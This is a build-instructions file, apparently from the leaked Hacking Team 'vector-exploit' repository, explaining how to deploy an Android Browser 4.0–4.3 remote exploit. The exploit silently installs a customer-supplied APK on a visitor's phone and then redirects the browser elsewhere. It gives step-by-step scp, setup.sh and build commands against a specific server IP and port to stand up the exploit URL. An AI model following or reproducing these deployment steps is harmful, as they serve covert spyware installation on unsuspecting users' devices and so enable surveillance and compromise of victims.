Sign upLogin

hackedteam/vector-exploit

View on GitHub
Star
src/ht-webkit-Android4-src/EDN_BUILD

Summary

Maintainability
Test Coverage

----------- [ Android Browser 4.0.x-4.3.x remote2local exploit ] ---------------
------------------------ [ EDN Build instructions ] ----------------------------

The exploit building process will be streamlined with a new GUI in the
future, but in the meantime the mobile remote2root exploit can be
easily deployed manually.

EDN exploit building requires three files:

* android43_browser_remote.zip: The actual exploit.
* setup.sh: The setup script.
* installer.apk: The apk for a specific customer or demo.


-- [ Instructions ]

1] Copy the zip package and the setup script to
   /root/android43_browser_remote, if it's not already there, e.g.,
$ scp -p -P 30090 android43_browser_remote.zip root@199.175.54.94:/root/android43_browser_remote/

2] Copy the setup script in the same directory, e.g.,
$ scp -p -P 30090 setup.sh root@199.175.54.94:/root/android43_browser_remote/

3] Copy your apk file anywhere on the server (if you want, the exploit
   directory can be used), e.g.
$ scp -p -P 30090 installer.apk root@199.175.54.94:/root/android43_browser_remote/

4] Login, chdir to /root/android43_browser_remote and run
   ./setup.sh <webserver_dir> <ip> <redirect> <apk>

   e.g.,
# cd /root/android43_browser_remote
# ./setup.sh cccccc 199.175.54.94 http://www.google.com ./installer.apk

this will create a new exploit instance at
http://<IP>/docs/<webserver_dir>/fwd which will install the provided
apk and redirect to the provided address after exploitation.

(http://199.175.54.94/docs/cccccc/fwd in the example)


--- [ Building manually using the EDN build script ]

1] Extract the package contents into a temp directory

2] Run the script (./build) like this:

./build <target_directory> <ip> <prefix> <redirect> <apk>

Where target_directory is the path where the files need to be stored
in the webserver file system and prefix is the URI compnent after the
IP address and before the fixed "/fwd" string.

As an example,
./build /var/www/files/cccccc 199.175.54.94 docs/cccccc
http://www.google.com ./installer.apk

will build the exploit in /var/www/files/cccccc which will be
accessible as http://199.175.54.94/docs/cccccc/fwd .

3] Set the necessary permissions (all .ini files need to be modified
or owned by apache)